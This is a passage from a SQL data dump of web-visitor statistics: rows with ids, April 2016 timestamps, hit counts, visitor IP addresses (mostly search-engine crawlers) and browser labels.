1,0,0,'217.69.133.67','other'),(33978,1459954555,1,0,1,0,'66.249.64.228',''),(33979,1459954567,1,1,0,0,'217.69.133.224','other'),(33980,1459954751,2,2,0,0,'217.69.133.70','other'),(33981,1459954890,1,1,0,0,'217.69.133.84','other'),(33982,1459954960,46,46,0,0,'51.255.207.26','other'),(33983,1459954968,1,1,0,0,'8.29.198.26','other'),(33984,1459955004,2,2,0,0,'217.69.133.228','other'),(33985,1459955012,2,1,1,0,'66.249.64.223',''),(33986,1459955089,1,1,0,0,'37.73.246.101','other'),(33987,1459955177,1,1,0,0,'217.69.133.220','other'),(33988,1459955474,1,1,0,0,'51.255.65.42','other'),(33989,1459955669,1,1,0,0,'66.249.64.150','other'),(33990,1459955694,1,0,1,0,'66.249.64.228',''),(33991,1459955982,4,0,4,0,'66.249.64.223',''),(33992,1459956001,1,1,0,0,'151.80.31.161','other'),(33993,1459956055,2,0,2,0,'66.249.64.233',''),(33994,1459956270,1,1,0,0,'217.69.133.223','other'),(33995,1459956282,1,1,0,0,'51.255.65.71','other'),(33996,1459956570,2,2,0,0,'66.249.64.223','other'),(33997,1459956751,1,1,0,0,'109.173.125.227','chrome'),(33998,1459956923,1,1,0,0,'130.193.50.34','other'),(33999,1459957044,1,1,0,0,'130.193.50.6','other'),(34000,1459957233,1,1,0,0,'217.69.133.230','other'),(34001,1459957330,1,0,1,0,'66.249.64.228',''),(34002,1459957375,8,1,7,0,'66.249.64.228',''),(34003,1459957528,8,0,8,0,'66.249.64.223',''),(34004,1459957699,1,0,1,0,'68.180.231.29',''),(34005,1459957953,1,1,0,0,'5.255.253.47','other'),(34006,1459958015,1,1,0,0,'217.69.133.13','other'),(34007,1459958077,2,0,2,0,'66.249.64.233',''),(34008,1459958080,1,1,0,0,'141.8.142.61','other'),(34009,1459958082,1,1,0,0,'141.8.142.67','other'),(34010,1459958141,1,1,0,0,'66.249.64.223','other'),(34011,1459958204,1,1,0,0,'141.8.183.19','other'),(34012,1459958329,1,1,0,0,'141.8.132.105','other'),(34013,1459958459,2,2,0,0,'109.173.125.227','chrome'),(34014,1459958471,1,1,0,0,'141.8.183.25','other'),(34015,1459958779,1,1,0,0,'217.69.133.18','other'),(34016,1459959073,1,1,0,0,'217.69.133.231','other'),(34017,1459959074,1,1,0,0,'217.69.133.230','other'),(34018,1459959136,1,1,0,0,'151.80.31.162','other'),(34019,1459959181,1,0,1,0,'66.249.64.233',''),(34020,1459959217,9,0,9,0,'66.249.64.228',''),(34021,1459959218,1,1,0,0,'217.69.133.70','other'),(34022,1459959219,1,1,0,0,'217.69.133.235','other'),(34023,1459959220,1,1,0,0,'217.69.133.239','other'),(34024,1459959456,6,0,6,0,'66.249.64.223',''),(34025,1459959593,288,288,0,0,'46.4.32.75','other'),(34026,1459959645,1,1,0,0,'217.69.133.237','other'),(34027,1459959646,1,1,0,0,'217.69.133.238','other'),(34028,1459959899,1,1,0,0,'217.69.133.218','other'),(34029,1459960002,2,2,0,0,'66.249.64.228','other'),(34030,1459960058,1,0,1,0,'68.180.231.29',''),(34031,1459960213,1,1,0,0,'217.69.133.234','other'),(34032,1459960713,1,1,0,0,'217.69.133.217','other'),(34033,1459960930,1,1,0,0,'62.210.215.100','chrome'),(34034,1459961131,3,0,3,0,'66.249.64.228',''),(34035,1459961288,2,0,2,0,'66.249.64.223',''),(34036,1459961333,4,0,4,0,'66.249.64.96',''),(34037,1459961353,1,1,0,0,'178.154.189.203','other'),(34038,1459961561,1,1,0,0,'66.249.64.85','other'),(34039,1459961664,1,1,0,0,'66.249.64.162','other'),(34040,1459961788,1,0,1,0,'66.249.64.101',''),(34041,1459962167,1,1,0,0,'178.154.189.201','other'),(34042,1459962533,1,0,1,0,'66.249.64.228',''),(34043,1459962831,1,1,0,0,'91.124.213.15','chrome'),(34044,1459962943,1,1,0,0,'164.132.161.82','other'),(34045,1459962977,5,1,4,0,'66.249.64.223',''),(34046,1459963111,1,1,0,0,'66.249.89.118','other'),(34047,1459963339,1,1,0,0,'141.8.142.58','other'),(34048,1459963343,1,1,0,0,'141.8.132.105','other'),(34049,1459963353,1,1,0,0,'217.69.133.223','other'),(34050,1459963505,2,0,2,0,'66.249.64.228',''),(34051,1459963580,3,0,3,0,'66.249.64.233',''),(34052,1459963702,1,1,0,0,'94.158.89.62','chrome'),(34053,1459963853,1,1,0,0,'66.249.64.223','other'),(34054,1459963870,2,0,2,0,'68.180.231.29',''),(34055,1459963951,1,1,0,0,'94.179.247.188','firefox'),(34056,1459964073,1,1,0,0,'95.133.238.95','chrome'),(34057,1459964272,1,0,1,0,'66.249.64.156',''),(34058,1459964470,1,1,0,0,'180.76.15.21','other'),(34059,1459964845,1,1,0,0,'51.255.65.23','other'),(34060,1459964866,1,0,1,0,'66.249.64.228',''),(34061,1459964894,2,0,2,0,'66.249.64.233',''),(34062,1459964930,4,0,4,0,'66.249.64.223',''),(34063,1459965018,1,0,1,0,'66.249.64.101',''),(34064,1459965202,1,1,0,0,'94.179.247.188','firefox'),(34065,1459965805,1,1,0,0,'8.29.198.25','other'),(34066,1459965841,2,0,2,0,'66.249.64.106',''),(34067,1459965939,2,2,0,0,'217.69.133.233','other'),(34068,1459966057,1,0,1,0,'66.249.64.101',''),(34069,1459966072,1,1,0,0,'91.196.178.162','firefox'),(34070,1459966211,1,1,0,0,'217.69.133.85','other'),(34071,1459966212,1,1,0,0,'130.180.212.193','firefox'),(34072,1459966248,1,1,0,0,'217.69.133.228','other'),(34073,1459966249,1,1,0,0,'217.69.133.230','other'),(34074,1459966266,1,1,0,0,'51.255.65.60','other'),(34075,1459966363,1,1,0,0,'66.249.64.156','other'),(34076,1459966545,3,0,3,0,'66.249.64.228',''),(34077,1459966550,2,0,2,0,'66.249.64.96',''),(34078,1459966643,1,1,0,0,'217.69.133.220','other'),(34079,1459966710,2,0,2,0,'66.249.64.233',''),(34080,1459966763,4,0,4,0,'66.249.64.223',''),(34081,1459967264,1,1,0,0,'193.194.127.217','firefox'),(34082,1459967394,2,0,2,0,'66.249.64.106',''),(34083,1459967474,3,0,3,0,'66.249.64.96',''),(34084,1459967488,1,1,0,0,'51.255.65.25','other'),(34085,1459967530,1,1,0,0,'164.132.161.63','other'),(34086,1459967820,1,0,1,0,'66.249.64.223',''),(34087,1459967940,4,4,0,0,'5.9.151.22','other'),(34088,1459968443,3,0,3,0,'66.249.64.106',''),(34089,1459968668,2,0,2,0,'66.249.64.228',''),(34090,1459968756,2,0,2,0,'66.249.64.233',''),(34091,1459968927,1,0,1,0,'66.249.64.162',''),(34092,1459969131,1,1,0,0,'180.76.15.163','other'),(34093,1459969342,1,1,0,0,'66.249.64.162','other'),(34094,1459969484,1,1,0,0,'94.179.1.153','firefox'),(34095,1459969945,1,1,0,0,'217.69.133.243','other'),(34096,1459969957,2,0,2,0,'66.249.64.223',''),(34097,1459970135,1,0,1,0,'66.249.64.106',''),(34098,1459970512,1,1,0,0,'94.179.247.188','other'),(34099,1459970577,1,1,0,0,'164.132.161.43','other'),(34100,1459970603,1,1,0,0,'217.69.133.223','other'),(34101,1459970604,1,1,0,0,'217.69.133.220','other'),(34102,1459971131,1,1,0,0,'217.69.133.85','other'),(34103,1459971140,1,1,0,0,'180.76.15.137','other'),(34104,1459971214,1,1,0,0,'164.132.161.63','other'),(34105,1459971245,1,1,0,0,'164.132.161.46','other'),(34106,1459971571,1,0,1,0,'66.249.64.228',''),(34107,1459971815,1,1,0,0,'217.69.133.193','other'),(34108,1459971864,1,1,0,0,'164.132.161.7','other'),(34109,1459972031,1,1,0,0,'82.145.209.26','opera'),(34110,1459972285,1,1,0,0,'151.80.31.166','other'),(34111,1459972506,3,0,3,0,'66.249.64.228',''),(34112,1459972515,4,0,4,0,'66.249.64.223',''),(34113,1459972538,1,1,0,0,'141.8.142.61','other'),(34114,1459972558,3,0,3,0,'66.249.64.96',''),(34115,1459972890,1,1,0,0,'217.69.133.84','other'),(34117,1459973445,1,1,0,0,'66.249.64.80','other'),(34118,1459973530,1,0,1,0,'68.180.231.29',''),(34119,1459973626,1,0,1,0,'68.180.229.103',''),(34120,1459973775,3,3,0,0,'5.255.253.113','other'),(34121,1459973797,11,11,0,0,'130.193.50.34','other'),(34122,1459973850,3,3,0,0,'141.8.132.105','other'),(34123,1459973977,1,1,0,0,'141.8.132.41','other'),(34124,1459974030,1,1,0,0,'130.193.51.83','other'),(34125,1459974047,1,1,0,0,'66.249.89.114','other'),(34126,1459974144,1,1,0,0,'141.8.142.67','other'),(34127,1459974148,2,2,0,0,'141.8.142.58','other'),(34128,1459974201,1,1,0,0,'82.145.209.112','opera'),(34129,1459974216,1,1,0,0,'93.158.152.40','other'),(34130,1459974236,1,1,0,0,'178.154.189.37','other'),(34131,1459974243,1,1,0,0,'141.8.132.10','other'),(34132,1459974256,1,1,0,0,'141.8.142.25','other'),(34133,1459974283,1,1,0,0,'93.158.152.51','other'),(34134,1459974340,2,0,2,0,'66.249.64.233',''),(34135,1459974366,2,2,0,0,'141.8.183.25','other'),(34136,1459974447,1,1,0,0,'164.132.161.12','other'),(34137,1459974523,7,0,7,0,'66.249.64.223',''),(34138,1459974628,1,1,0,0,'180.76.15.29','other'),(34139,1459974899,1,1,0,0,'141.8.132.105','other'),(34140,1459974984,1,1,0,0,'66.249.64.150','other'),(34141,1459975370,3,3,0,0,'141.8.183.25','other'),(34142,1459975425,2,0,2,0,'66.249.64.228',''),(34143,1459975575,1,0,1,0,'66.249.64.156',''),(34144,1459975672,1,1,0,0,'5.9.87.111','other'),(34145,1459975744,1,1,0,0,'130.193.50.34','other'),(34146,1459975877,1,1,0,0,'141.8.132.105','other'),(34147,1459975919,1,1,0,0,'40.77.167.77','other'),(34148,1459975928,1,1,0,0,'217.69.133.227','other'),(34149,1459975951,1,1,0,0,'144.76.12.75','other'),(34150,1459976011,1,1,0,0,'82.145.209.112','opera'),(34151,1459976136,1,1,0,0,'130.193.37.7','other'),(34152,1459976292,2,0,2,0,'66.249.64.233',''),(34153,1459976318,7,0,7,0,'66.249.64.223',''),(34154,1459976321,1,1,0,0,'217.69.133.236','other'),(34155,1459976727,1,1,0,0,'8.29.198.26','other'),(34156,1459976803,1,1,0,0,'130.193.51.19','other'),(34157,1459976807,1,1,0,0,'141.8.183.14','other'),(34158,1459976950,1,1,0,0,'141.8.142.67','other'),(34159,1459977104,2,0,2,0,'66.249.64.228',''),(34160,1459977111,1,1,0,0,'178.154.189.37','other'),(34161,1459977188,1,1,0,0,'93.158.152.51','other'),(34162,1459977266,1,1,0,0,'46.161.9.6','other'),(34163,1459977273,2,2,0,0,'217.69.133.84','other'),(34164,1459977536,2,2,0,0,'217.69.133.225','other'),(34165,1459977583,2,2,0,0,'217.69.133.85','other'),(34166,1459977619,1,1,0,0,'157.55.39.185','other'),(34167,1459978061,1,1,0,0,'217.69.133.215','other'),(34168,1459978097,1,1,0,0,'141.8.142.25','other'),(34169,1459978206,1,0,1,0,'66.249.64.101',''),(34170,1459978213,6,0,6,0,'66.249.64.223',''),(34171,1459978312,1,0,1,0,'66.249.64.156',''),(34172,1459978409,1,1,0,0,'130.193.37.7','other'),(34173,1459978453,1,0,1,0,'66.249.64.228',''),(34174,1459978668,1,1,0,0,'141.8.142.67','other'),(34175,1459978672,1,1,0,0,'93.158.152.51','other'),(34176,1459978756,1,1,0,0,'93.158.152.61','other'),(34177,1459978764,1,1,0,0,'130.193.50.38','other'),(34178,1459978981,4,4,0,0,'5.255.253.113','other'),(34179,1459979030,18,18,0,0,'130.193.50.34','other'),(34180,1459979068,1,1,0,0,'180.76.15.147','other'),(34181,1459979076,4,4,0,0,'130.193.51.83','other'),(34182,1459979122,1,1,0,0,'130.193.51.19','other'),(34183,1459979133,1,1,0,0,'217.69.133.69','other'),(34184,1459979171,7,7,0,0,'141.8.183.25','other'),(34185,1459979317,9,9,0,0,'141.8.132.105','other'),(34186,1459979822,2,0,2,0,'66.249.64.228',''),(34187,1459979856,9,0,9,0,'66.249.64.223',''),(34188,1459979858,1,1,0,0,'217.69.133.227','other'),(34189,1459979936,1,0,1,0,'66.249.64.162',''),(34190,1459979947,6,6,0,0,'130.193.50.34','other'),(34191,1459980138,2,2,0,0,'5.255.253.113','other'),(34192,1459980235,3,3,0,0,'141.8.132.105','other'),(34193,1459980309,1,1,0,0,'180.76.15.160','other'),(34194,1459980345,1,1,0,0,'217.69.133.15','other'),(34195,1459980346,1,1,0,0,'217.69.133.18','other'),(34196,1459980348,1,1,0,0,'130.193.51.83','other'),(34197,1459980358,1,1,0,0,'51.255.65.74','other'),(34198,1459980477,2,2,0,0,'141.8.183.25','other'),(34199,1459980562,1,1,0,0,'217.69.133.5','other'),(34200,1459980563,1,1,0,0,'217.69.133.2','other'),(34201,1459980655,1,1,0,0,'217.69.133.222','other'),(34202,1459980979,3,3,0,0,'130.193.50.34','other'),(34203,1459981072,2,0,2,0,'66.249.64.106',''),(34205,1459981234,1,0,1,0,'66.249.64.223',''),(34206,1459981279,1,1,0,0,'62.210.215.100','chrome'),(34207,1459981320,1,1,0,0,'157.55.39.185','other'),(34208,1459981330,1,1,0,0,'217.69.133.18','other'),(34209,1459981416,2,2,0,0,'5.255.253.113','other'),(34210,1459981627,2,0,2,0,'66.249.64.233',''),(34211,1459981637,1,1,0,0,'66.249.64.156','other'),(34212,1459981668,1,1,0,0,'141.8.183.19','other'),(34213,1459981771,1,1,0,0,'217.69.133.70','other'),(34214,1459981803,1,1,0,0,'141.8.132.41','other'),(34215,1459981995,1,1,0,0,'130.193.50.34','other'),(34216,1459982151,1,1,0,0,'217.69.133.194','other'),(34217,1459982152,1,1,0,0,'217.69.133.2','other'),(34218,1459982541,1,1,0,0,'178.63.86.11','other'),(34219,1459982889,1,1,0,0,'51.255.65.67','other'),(34220,1459982893,5,5,0,0,'72.91.230.34','other'),(34221,1459983009,1,1,0,0,'217.69.133.240','other'),(34222,1459983244,1,1,0,0,'217.69.133.67','other'),(34223,1459983272,1,0,1,0,'66.249.64.156',''),(34224,1459983436,2,0,2,0,'66.249.64.150',''),(34225,1459983452,1,1,0,0,'51.255.65.3','other'),(34226,1459983473,1,0,1,0,'66.249.64.233',''),(34227,1459983490,2,0,2,0,'66.249.64.228',''),(34228,1459983503,3,0,3,0,'66.249.64.223',''),(34229,1459983770,1,1,0,0,'217.69.133.232','other'),(34230,1459983938,1,1,0,0,'164.132.161.38','other'),(34231,1459984124,1,1,0,0,'217.69.133.228','other'),(34232,1459984492,1,1,0,0,'217.69.133.235','other'),(34233,1459984496,1,1,0,0,'157.55.39.101','other'),(34234,1459984538,1,1,0,0,'66.249.64.156','other'),(34235,1459984691,1,1,0,0,'217.69.133.224','other'),(34236,1459984933,2,2,0,0,'217.69.133.3','other'),(34237,1459985122,1,1,0,0,'66.249.89.114','other'),(34238,1459985284,1,0,1,0,'66.249.64.162',''),(34239,1459985295,1,0,1,0,'66.249.64.150',''),(34240,1459985323,3,0,3,0,'66.249.64.228',''),(34241,1459985542,1,0,1,0,'66.249.64.233',''),(34242,1459985547,1,1,0,0,'217.69.133.9','other'),(34243,1459985619,9,0,9,0,'66.249.64.223',''),(34244,1459985808,1,1,0,0,'217.69.133.225','other'),(34246,1459985809,1,1,0,0,'217.69.133.68','other'),(34247,1459985922,1,0,1,0,'68.180.231.29',''),(34248,1459986002,1,1,0,0,'62.210.215.100','chrome'),(34249,1459986599,1,1,0,0,'93.158.152.61','other'),(34250,1459986604,1,1,0,0,'5.255.253.68','other'),(34251,1459986696,2,0,2,0,'66.249.64.228',''),(34252,1459987011,1,1,0,0,'164.132.161.4','other'),(34253,1459987026,1,1,0,0,'217.69.133.239','other'),(34254,1459987028,1,1,0,0,'217.69.133.234','other'),(34255,1459987257,2,0,2,0,'66.249.64.233',''),(34256,1459987318,1,1,0,0,'141.8.142.61','other'),(34257,1459987323,1,1,0,0,'93.158.152.51','other'),(34258,1459987459,1,0,1,0,'66.249.64.223',''),(34259,1459987534,2,0,2,0,'66.249.64.150',''),(34260,1459987572,1,1,0,0,'8.29.198.25','other'),(34261,1459987697,1,1,0,0,'66.249.64.156','other'),(34262,1459988357,4,4,0,0,'176.36.80.39','other'),(34263,1459988423,2,0,2,0,'66.249.64.228',''),(34264,1459988447,4,0,4,0,'66.249.64.223',''),(34265,1459988834,2,0,2,0,'66.249.64.233',''),(34266,1459988937,1,1,0,0,'217.69.133.227','other'),(34267,1459989023,27,27,0,0,'162.210.196.129','other'),(34268,1459989042,1,1,0,0,'178.154.189.203','other'),(34269,1459989114,1,1,0,0,'217.69.133.221','other'),(34270,1459989301,1,1,0,0,'164.132.161.10','other'),(34271,1459989460,1,1,0,0,'217.69.133.232','other'),(34272,1459989485,55,55,0,0,'149.56.110.175','other'),(34273,1459989621,3,0,3,0,'66.249.64.228',''),(34274,1459989944,2,0,2,0,'66.249.64.233',''),(34275,1459990008,2,2,0,0,'217.69.133.70','other'),(34276,1459990111,1,1,0,0,'217.69.133.240','other'),(34277,1459990113,1,1,0,0,'217.69.133.239','other'),(34278,1459990114,1,1,0,0,'217.69.133.236','other'),(34279,1459990326,7,0,7,0,'66.249.64.223',''),(34280,1459990483,1,0,1,0,'66.249.78.51',''),(34281,1459990484,1,0,1,0,'66.249.64.162',''),(34282,1459990535,1,0,1,0,'66.249.64.156',''),(34283,1459990715,1,1,0,0,'104.236.83.58','other'),(34284,1459990976,3,3,0,0,'141.8.132.105','other'),(34285,1459990980,7,7,0,0,'130.193.50.34','other'),(34286,1459991129,2,0,2,0,'66.249.64.228',''),(34287,1459991226,1,1,0,0,'141.8.183.25','other'),(34288,1459991648,1,1,0,0,'51.255.65.49','other'),(34289,1459992518,4,0,4,0,'66.249.64.228',''),(34290,1459992890,1,0,1,0,'66.249.64.162',''),(34291,1459993115,1,0,1,0,'66.249.64.223',''),(34292,1459993642,1,1,0,0,'217.69.133.218','other'),(34293,1459993643,1,1,0,0,'217.69.133.217','other'),(34294,1459993644,1,1,0,0,'217.69.133.215','other'),(34295,1459993727,1,1,0,0,'164.132.161.84','other'),(34296,1459993825,1,0,1,0,'66.249.64.156',''),(34297,1459994005,1,1,0,0,'217.69.133.235','other'),(34298,1459994060,1,1,0,0,'157.55.39.101','other'),(34299,1459994116,1,1,0,0,'217.69.133.232','other'),(34300,1459994161,1,1,0,0,'141.8.132.105','other'),(34301,1459994257,1,1,0,0,'151.80.31.162','other'),(34302,1459994295,1,1,0,0,'217.69.133.239','other'),(34303,1459994551,1,0,1,0,'68.180.231.29',''),(34304,1459994724,1,1,0,0,'217.69.133.223','other'),(34305,1459994839,5,0,5,0,'66.249.64.228',''),(34306,1459994849,4,0,4,0,'66.249.64.223',''),(34307,1459995125,5,5,0,0,'157.55.39.101','other'),(34308,1459995130,7,7,0,0,'157.55.39.130','other'),(34309,1459995138,8,8,0,0,'157.55.39.185','other'),(34310,1459996151,1,1,0,0,'217.69.133.233','other'),(34311,1459996181,1,1,0,0,'66.249.89.116','other'),(34312,1459996510,1,1,0,0,'37.115.120.76','chrome'),(34313,1459996616,2,1,1,0,'66.249.64.162',''),(34314,1459996888,2,2,0,0,'69.30.213.138','other'),(34315,1459996962,1,0,1,0,'66.249.64.150',''),(34316,1459996971,2,0,2,0,'66.249.64.233',''),(34317,1459996989,2,0,2,0,'66.249.64.223',''),(34318,1459996993,1,1,0,0,'217.69.133.203','other'),(34319,1459996996,2,0,2,0,'66.249.64.228',''),(34320,1459997131,1,1,0,0,'130.193.50.34','other'),(34321,1459997166,1,1,0,0,'66.249.64.162','other'),(34322,1459997206,1,1,0,0,'164.132.161.65','other'),(34323,1459997311,1,1,0,0,'217.69.136.208','other'),(34324,1459997312,1,1,0,0,'217.69.136.210','other'),(34325,1459997330,1,1,0,0,'141.8.183.25','other'),(34326,1459997640,1,1,0,0,'5.9.151.22','other'),(34327,1459997895,3,3,0,0,'144.76.61.21','other'),(34328,1459998292,1,1,0,0,'141.8.183.25','other'),(34329,1459998296,2,2,0,0,'130.193.50.34','other'),(34331,1459998299,1,1,0,0,'141.8.132.105','other'),(34332,1459998393,1,1,0,0,'8.29.198.26','other'),(34333,1459998817,2,0,2,0,'66.249.64.228',''),(34334,1459998901,1,0,1,0,'66.249.64.101',''),(34335,1459999008,1,0,1,0,'66.249.64.223',''),(34336,1459999015,1,1,0,0,'51.255.65.79','other'),(34337,1459999036,1,0,1,0,'66.249.64.96',''),(34338,1459999420,2,0,2,0,'66.249.64.233',''),(34339,1459999775,1,1,0,0,'40.77.167.77','other'),(34340,1459999871,1,1,0,0,'164.132.161.4','other'),(34341,1460000368,1,0,1,0,'66.249.64.233',''),(34342,1460000475,1,1,0,0,'141.0.15.72','other'),(34343,1460000592,1,0,1,0,'66.249.64.223',''),(34344,1460000637,1,1,0,0,'217.69.133.218','other'),(34345,1460000878,1,0,1,0,'66.249.64.150',''),(34346,1460001036,1,1,0,0,'217.69.133.219','other'),(34347,1460001042,1,1,0,0,'130.193.50.34','other'),(34348,1460001511,1,0,1,0,'66.249.64.233',''),(34349,1460001789,1,1,0,0,'178.255.215.95','other'),(34350,1460002100,1,1,0,0,'217.69.133.232','other'),(34351,1460002253,1,1,0,0,'157.55.39.185','other'),(34352,1460002560,1,0,1,0,'68.180.231.29',''),(34353,1460002708,1,1,0,0,'164.132.161.51','other'),(34354,1460003128,1,1,0,0,'178.255.215.95','other'),(34355,1460003219,1,0,1,0,'66.249.64.228',''),(34356,1460003221,2,0,2,0,'66.249.64.233',''),(34357,1460003339,1,0,1,0,'66.249.64.223',''),(34358,1460003513,1,1,0,0,'62.210.215.100','chrome'),(34359,1460003562,1,1,0,0,'51.255.65.21','other'),(34360,1460003591,1,1,0,0,'180.76.15.159','other'),(34361,1460003959,1,1,0,0,'66.249.64.162','other'),(34362,1460004261,1,1,0,0,'51.255.65.8','other'),(34363,1460004312,2,0,2,0,'66.249.64.233',''),(34364,1460004425,3,3,0,0,'141.8.132.105','other'),(34365,1460004499,1,1,0,0,'217.69.133.226','other'),(34366,1460004666,2,0,2,0,'66.249.64.228',''),(34367,1460004786,1,1,0,0,'217.69.133.237','other'),(34368,1460005251,1,1,0,0,'217.69.133.69','other'),(34369,1460005329,2,0,2,0,'66.249.64.223',''),(34370,1460005520,1,1,0,0,'141.8.183.25','other'),(34371,1460006142,1,1,0,0,'176.241.109.84','firefox'),(34372,1460006192,1,1,0,0,'217.69.133.67','other'),(34374,1460006458,1,1,0,0,'66.249.64.233','other'),(34375,1460006461,1,1,0,0,'66.249.89.118','other'),(34376,1460006543,2,0,2,0,'66.249.64.223',''),(34377,1460006871,1,1,0,0,'91.196.178.71','firefox'),(34378,1460006993,2,0,2,0,'66.249.64.228',''),(34379,1460007038,1,1,0,0,'217.69.133.237','other'),(34380,1460007063,1,1,0,0,'217.69.133.224','other'),(34381,1460007306,1,1,0,0,'217.69.133.84','other'),(34382,1460007402,1,1,0,0,'151.80.31.181','other'),(34383,1460007451,1,0,1,0,'66.249.64.162',''),(34384,1460007479,1,1,0,0,'91.196.178.66','firefox'),(34385,1460007530,1,1,0,0,'91.196.178.72','firefox'),(34386,1460008182,1,1,0,0,'164.132.161.91','other'),(34387,1460008336,1,1,0,0,'5.166.237.88','chrome'),(34388,1460008345,3,0,3,0,'66.249.64.223',''),(34389,1460008495,1,1,0,0,'93.158.152.84','other'),(34390,1460008597,1,0,1,0,'68.180.231.29',''),(34391,1460008676,1,1,0,0,'157.55.39.130','other'),(34392,1460008998,1,1,0,0,'31.184.238.121','chrome'),(34393,1460009188,1,1,0,0,'95.135.240.165','chrome'),(34394,1460009284,1,1,0,0,'8.29.198.25','other'),(34395,1460009285,1,1,0,0,'217.69.133.235','other'),(34396,1460009297,1,0,1,0,'66.249.64.233',''),(34397,1460009364,2,0,2,0,'66.249.64.228',''),(34398,1460009410,1,1,0,0,'40.77.167.77','other'),(34399,1460009834,1,1,0,0,'93.183.210.254','opera'),(34400,1460009844,2,0,2,0,'66.249.64.223',''),(34401,1460009961,1,1,0,0,'51.255.65.96','other'),(34402,1460010142,2,0,2,0,'68.180.231.29',''),(34403,1460010447,1,1,0,0,'93.158.152.40','other'),(34404,1460010626,1,1,0,0,'217.69.133.222','other'),(34405,1460010636,1,1,0,0,'217.69.133.231','other'),(34406,1460010667,1,1,0,0,'66.249.93.67','chrome'),(34407,1460010840,1,1,0,0,'91.196.178.66','chrome'),(34408,1460010933,1,0,1,0,'66.249.64.228',''),(34409,1460011189,1,1,0,0,'141.8.132.105','other'),(34410,1460011395,1,1,0,0,'185.8.40.56','chrome'),(34411,1460011594,1,0,1,0,'66.249.64.162',''),(34412,1460011848,1,1,0,0,'217.69.133.223','other'),(34413,1460011855,1,1,0,0,'157.55.39.185','other'),(34414,1460012052,1,1,0,0,'217.69.133.85','other'),(34415,1460012397,3,0,3,0,'66.249.64.223',''),(34416,1460012491,3,0,3,0,'66.249.64.228',''),(34417,1460012561,1,1,0,0,'176.101.222.76','firefox'),(34418,1460012755,1,0,1,0,'66.249.64.233',''),(34419,1460013146,1,1,0,0,'217.69.133.230','other'),(34420,1460013424,1,1,0,0,'130.193.50.34','other'),(34421,1460013434,1,1,0,0,'164.132.161.87','other'),(34422,1460013610,1,1,0,0,'217.69.133.233','other'),(34423,1460013668,1,1,0,0,'141.8.132.105','other'),(34424,1460013695,1,1,0,0,'157.55.39.130','other'),(34425,1460014097,1,1,0,0,'217.69.133.13','other'),(34426,1460014098,1,1,0,0,'217.69.133.193','other'),(34427,1460014370,1,1,0,0,'164.132.161.63','other'),(34428,1460014445,1,1,0,0,'46.201.135.6','firefox'),(34429,1460014457,1,0,1,0,'66.249.64.156',''),(34430,1460014630,1,0,1,0,'66.249.64.228',''),(34431,1460014661,1,1,0,0,'91.196.178.66','chrome'),(34432,1460015055,1,0,1,0,'66.249.64.223',''),(34433,1460015128,1,1,0,0,'164.132.161.44','other'),(34434,1460015257,1,0,1,0,'68.180.231.29',''),(34435,1460015331,1,1,0,0,'151.80.31.170','other'),(34436,1460015657,4,4,0,0,'141.8.183.25','other'),(34437,1460015783,3,0,3,0,'66.249.64.233',''),(34438,1460015800,22,22,0,0,'130.193.50.34','other'),(34439,1460015842,1,1,0,0,'66.249.64.228','other'),(34440,1460015939,1,1,0,0,'151.80.31.172','other'),(34441,1460015948,13,13,0,0,'141.8.132.105','other'),(34442,1460016082,3,0,3,0,'66.249.64.223',''),(34443,1460016280,1,1,0,0,'217.69.133.11','other'),(34444,1460016352,1,1,0,0,'217.69.133.223','other'),(34445,1460016405,1,1,0,0,'66.249.64.150','other'),(34446,1460016551,1,1,0,0,'66.249.64.233','other'),(34447,1460016596,3,3,0,0,'141.8.183.25','other'),(34448,1460016723,2,2,0,0,'130.193.51.83','other'),(34449,1460016727,13,13,0,0,'130.193.50.34','other'),(34450,1460016764,3,3,0,0,'5.255.253.113','other'),(34451,1460016841,1,1,0,0,'157.55.39.111','other'),(34452,1460016853,5,5,0,0,'141.8.132.105','other'),(34453,1460016936,2,2,0,0,'91.196.178.72','chrome'),(34454,1460017411,1,1,0,0,'66.249.89.118','other'),(34455,1460017749,1,0,1,0,'68.180.231.29',''),(34456,1460017824,1,1,0,0,'164.132.161.80','other'),(34457,1460017894,1,1,0,0,'217.69.133.217','other'),(34458,1460017956,1,1,0,0,'91.196.178.66','firefox'),(34459,1460018371,1,1,0,0,'66.249.64.150','other'),(34460,1460018492,1,0,1,0,'66.249.64.223',''),(34461,1460018528,1,1,0,0,'91.196.178.70','chrome'),(34462,1460018857,2,2,0,0,'217.69.133.4','other'),(34463,1460018858,1,1,0,0,'217.69.133.6','other'),(34464,1460018896,2,2,0,0,'157.55.39.111','other'),(34465,1460019182,1,1,0,0,'130.193.51.83','other'),(34466,1460019233,1,1,0,0,'95.132.49.231','chrome'),(34467,1460019402,3,3,0,0,'130.193.50.34','other'),(34468,1460019471,1,1,0,0,'141.8.183.25','other'),(34469,1460019494,1,0,1,0,'66.249.64.223',''),(34470,1460019545,1,1,0,0,'169.57.0.241','other'),(34471,1460019734,2,1,1,0,'66.249.64.156',''),(34472,1460019940,1,0,1,0,'66.249.64.228',''),(34473,1460019959,1,1,0,0,'151.80.31.173','other'),(34474,1460020124,1,1,0,0,'130.193.51.83','other'),(34475,1460020180,1,1,0,0,'66.249.64.162','other'),(34476,1460020307,1,1,0,0,'8.29.198.26','other'),(34477,1460020336,1,0,1,0,'68.180.231.29',''),(34478,1460020440,2,2,0,0,'141.8.132.105','other'),(34479,1460020495,1,1,0,0,'217.69.133.225','other'),(34480,1460020648,1,1,0,0,'217.69.133.15','other'),(34481,1460020649,1,1,0,0,'217.69.133.10','other'),(34482,1460020681,91,91,0,0,'176.9.10.227','other'),(34483,1460021171,2,0,2,0,'66.249.64.223',''),(34484,1460021305,1,1,0,0,'94.179.6.58','chrome'),(34485,1460021502,1,1,0,0,'130.193.50.34','other'),(34486,1460021505,2,2,0,0,'217.69.133.222','other'),(34487,1460021717,2,0,2,0,'66.249.64.228',''),(34488,1460022062,1,1,0,0,'164.132.161.74','other'),(34489,1460022387,1,1,0,0,'217.69.133.85','other'),(34490,1460022438,1,1,0,0,'217.69.133.228','other'),(34491,1460022503,2,2,0,0,'130.193.50.34','other'),(34492,1460022552,1,0,1,0,'66.249.64.156',''),(34493,1460022677,1,0,1,0,'68.180.231.29',''),(34494,1460022914,1,1,0,0,'95.132.41.169','firefox'),(34495,1460023002,1,1,0,0,'217.69.136.208','other'),(34496,1460023003,1,1,0,0,'217.69.136.209','other'),(34497,1460023004,1,1,0,0,'217.69.136.207','other'),(34498,1460023109,1,1,0,0,'91.196.178.166','chrome'),(34499,1460023158,1,1,0,0,'217.69.133.6','other'),(34500,1460023298,3,0,3,0,'66.249.64.228',''),(34501,1460023641,2,0,2,0,'66.249.64.233',''),(34502,14600